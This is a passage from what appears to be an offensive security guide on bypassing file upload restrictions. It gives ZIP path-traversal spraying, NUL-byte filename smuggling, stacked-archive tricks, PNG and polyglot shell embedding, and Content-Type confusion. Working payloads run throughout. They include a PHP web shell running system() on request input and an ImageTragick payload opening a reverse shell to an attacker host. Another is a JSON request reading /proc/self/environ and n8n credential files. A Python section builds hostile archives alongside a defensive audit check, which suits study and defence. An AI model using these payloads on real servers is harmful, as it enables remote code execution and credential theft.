    with open('poc.zip', 'wb') as out:
        out.write(f.getvalue())


create_zip()

Abusing compression for file spraying

For more details check the original post at: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/

  1. Creating a PHP Shell: PHP code is written to execute commands passed through $_REQUEST.
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}?>
  2. File Spraying and Compressed File Creation: Multiple files are created and a zip archive is assembled containing them.
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
  3. Modification with a Hex Editor or vi: The names of the files inside the zip are altered using vi or a hex editor, changing "xxA" to "../" to traverse directories.
:set modifiable
:%s/xxA/../g
:x!

ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)

When a backend validates ZIP entries using PHP's ZipArchive but extraction writes to the filesystem using a different code path, you can smuggle a disallowed extension by embedding a NUL (0x00) in the filename. One side treats the entry name as a C string and stops at the first NUL, the other keeps the full name bytes, so the two paths disagree about what the filename actually is.

High-level flow:

  • Prepare a valid container file (e.g., a valid PDF) that embeds a small PHP stub in a stream so magic/MIME remains PDF.
  • Name it something like shell.php..pdf, zip it, then hex-edit the ZIP local header and central directory filename to replace the first . after .php with 0x00, yielding shell.php\x00.pdf.
  • The validation path sees a name ending in .pdf and allows it; the extraction path writes shell.php to disk, leading to RCE if the upload folder is executable.

Minimal PoC steps:

# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
#    %b expands the \n escapes; single quotes keep $_REQUEST literal
printf '%b' '%PDF-1.3\n1 0 obj<<>>stream\n<?php system($_REQUEST["cmd"]); ?>\nendstream\nendobj\n%%EOF' > embedded.pdf

# 2) Trick name and zip
cp embedded.pdf shell.php..pdf
zip null.zip shell.php..pdf

# 3) Hex-edit both the local header and central directory filename fields
#    Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
#    Tools: hexcurse, bless, bvi, wxHexEditor, etc.

# 4) Local validation behavior
php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
# -> prints the name as ZipArchive sees it; compare with a raw listing (e.g. unzip -l) to observe the disagreement

Notes

  • Replace ALL occurrences of the filename (local header and central directory). Some tools add a data descriptor entry too; fix every name field that is present.
  • The payload file must still pass server-side magic/MIME sniffing. Embedding PHP inside a PDF stream keeps the header valid.
  • This works wherever the enumeration/validation path and the extraction/write path disagree about string handling.

Stacked/concatenated ZIPs (parser disagreement)

Concatenating two valid ZIPs produces a blob in which different parsers honour different EOCD records. Most tools locate the last End Of Central Directory (EOCD) record, while some libraries (e.g., ZipArchive in specific workflows) may process the first archive they encounter. If validation enumerates the first archive but extraction uses another tool that honours the last EOCD, a benign archive can pass the checks while the malicious one gets picked up and extracted.

PoC:

# Build two separate archives
printf test > t1; printf test2 > t2
zip zip1.zip t1; zip zip2.zip t2

# Stack them
cat zip1.zip zip2.zip > combo.zip

# Different views
unzip -l combo.zip   # warns about extra bytes; often lists entries from the last archive
php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'

Abuse pattern

  • Create a benign archive (allowed type, e.g., PDF) and a second archive with a forbidden extension (e.g., shell.php).
  • Concatenate them: cat benign.zip evil.zip > combined.zip.
  • If the server validates with one parser (sees benign.zip) but extracts with another (processes evil.zip), the forbidden file ends up in the extraction path.
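The three ZIP tricks above (traversal and symlink entries, NUL-byte names, stacked archives) all come down to the validator and the extractor reading the archive differently. The added Python example below (not code from the page or from any library it mentions) builds each kind of archive in memory and then exposes that disagreement: a raw walk of the central directory returns the exact name bytes from every stacked archive, while Python's own zipfile, like a C-string parser, cuts names at the first NUL and only sees the last EOCD. `audit_archive` is the pre-extraction check a safe extractor should run. The archive contents and names are constructed for the example.

```python
import io
import os
import struct
import tempfile
import zipfile
from typing import Optional

CD_SIG = b"PK\x01\x02"    # central directory file header signature
EOCD_SIG = b"PK\x05\x06"  # end of central directory record signature


def build_zip(entries: dict, symlinks: Optional[dict] = None) -> bytes:
    """Constructed archive: {name: data} regular entries plus optional
    {name: target} symlink entries (mode 0o120777 in the external attributes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
        for name, target in (symlinks or {}).items():
            info = zipfile.ZipInfo(name)
            info.external_attr = 0o120777 << 16
            zf.writestr(info, target)
    return buf.getvalue()


def build_nul_zip() -> bytes:
    """zipfile will not write a NUL into a name, so write a placeholder and patch
    both copies of the name (local header and central directory) afterwards."""
    placeholder = "shell.phpX.pdf"
    data = build_zip({placeholder: "%PDF-1.3 <?php system($_REQUEST['cmd']); ?>"})
    return data.replace(placeholder.encode(), b"shell.php\x00.pdf")


def raw_names(data: bytes) -> list:
    """Exact name bytes from every central-directory record found in the blob,
    across all stacked archives, without any parser's string handling.
    (Lenient scan: it trusts each signature it finds.)"""
    names, pos = [], data.find(CD_SIG)
    while pos != -1:
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        names.append(data[pos + 46:pos + 46 + name_len])
        pos = data.find(CD_SIG, pos + 46 + name_len + extra_len + comment_len)
    return names


def zipfile_names(data: bytes) -> list:
    """What Python's zipfile reports: the last EOCD wins, names stop at the first NUL."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def extracted_names(data: bytes) -> list:
    """File names zipfile actually creates on disk (in a throwaway directory)."""
    with tempfile.TemporaryDirectory() as tmp, zipfile.ZipFile(io.BytesIO(data)) as zf:
        zf.extractall(tmp)
        return sorted(os.listdir(tmp))


def audit_archive(data: bytes) -> list:
    """Findings a safe extractor should reject on before writing anything."""
    findings = []
    if data.count(EOCD_SIG) > 1:
        findings.append("stacked archives: more than one EOCD record")
    for raw in raw_names(data):
        if b"\x00" in raw:
            findings.append(f"NUL byte in entry name {raw!r}")
        name = raw.decode("utf-8", "replace").replace("\\", "/")
        if name.startswith("/") or ".." in name.split("/"):
            findings.append(f"path traversal in {name!r}")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if (info.external_attr >> 16) & 0o170000 == 0o120000:
                findings.append(f"symlink entry {info.filename!r} -> {zf.read(info).decode()!r}")
    return findings


if __name__ == "__main__":
    nul = build_nul_zip()
    print(raw_names(nul), zipfile_names(nul), extracted_names(nul))
    combo = build_zip({"t1": "test"}) + build_zip({"t2": "test2"})
    print(raw_names(combo), zipfile_names(combo))
    evil = build_zip({"../../../../var/www/html/shell.php": "<?php ?>"},
                     symlinks={"symindex.txt": "../../../index.php"})
    for finding in audit_archive(evil) + audit_archive(nul) + audit_archive(combo):
        print(finding)
```

For the NUL archive the raw walk returns `shell.php\x00.pdf` (suffix .pdf) while zipfile lists and extracts `shell.php`; for the stacked blob the raw walk returns both `t1` and `t2` while zipfile only sees `t2`. Whichever side the server's validator is on, the audit function catches the archive before the extractor runs.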

ImageTragic

Upload this content with an image extension to exploit the vulnerability (ImageMagick, 7.0.1-1) (from the exploit)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

Embedding a PHP Shell in a PNG

Embedding a PHP shell in the IDAT chunk of a PNG file can effectively bypass certain image processing operations. The functions imagecopyresized and imagecopyresampled from PHP-GD are particularly relevant in this context, as they are commonly used for resizing and resampling images, respectively. The ability of the embedded PHP shell to remain unaffected by these operations is a significant advantage for certain use cases.

A detailed exploration of this technique, including its methodology and potential applications, is provided in the following article: "Encoding Web Shells in PNG IDAT chunks". This resource offers a comprehensive understanding of the process and its implications.

More information in: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

Polyglot Files

Polyglot files serve as a unique tool in cybersecurity, acting as chameleons that can validly exist in multiple file formats simultaneously. An intriguing example is a GIFAR, a hybrid that functions both as a GIF and as a RAR archive. Such files aren't limited to this pairing; combinations like GIF and JS or PPT and JS are also possible.

The core utility of polyglot files lies in their capacity to circumvent security measures that screen files based on type. Common practice in various applications is to permit only certain file types for upload, like JPEG, GIF, or DOC, to mitigate the risk posed by potentially harmful formats (e.g., JS, PHP, or Phar files). However, a polyglot, by conforming to the structural criteria of multiple file types, can stealthily bypass these restrictions.

Despite their adaptability, polyglots do encounter limitations. For instance, while a polyglot might simultaneously be a PHAR file (PHp ARchive) and a JPEG, the success of its upload might hinge on the platform's file extension policies. If the system is strict about allowed extensions, the mere structural duality of a polyglot may not suffice to guarantee its upload.

More information in: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Upload valid JSONs as if they were PDFs

How to avoid file type detection by uploading a valid JSON file even if it is not allowed, by faking a PDF file (techniques from this blog post):

  • mmmagic library: As long as the %PDF magic bytes appear within the first 1024 bytes it's considered valid (see the example in the post)
  • pdflib library: Add a fake PDF structure inside a field of the JSON so the library thinks it's a PDF (see the example in the post)
  • file binary: It reads up to 1048576 bytes from the file. Create a JSON bigger than that so it can't parse the content as JSON, and then inside the JSON put the initial part of a real PDF and it will think it's a PDF

Content-Type confusion to arbitrary file read

Some upload handlers trust the parsed request body (e.g., context.getBodyData().files) and later copy the file from file.filepath without first enforcing Content-Type: multipart/form-data. If the server accepts application/json, you can supply a fake files object pointing filepath at any local path, turning the upload flow into an arbitrary file read primitive.

Example POST against a form workflow returning the uploaded binary in the HTTP response:

POST /form/vulnerable-form HTTP/1.1
Host: target
Content-Type: application/json

{
  "files": {
    "document": {
      "filepath": "/proc/self/environ",
      "mimetype": "image/png",
      "originalFilename": "x.png"
    }
  }
}

The backend copies file.filepath, so the response returns the contents of that path. Typical chain: read /proc/self/environ to learn $HOME, then $HOME/.n8n/config for the encryption keys and $HOME/.n8n/database.sqlite for user credentials.

References
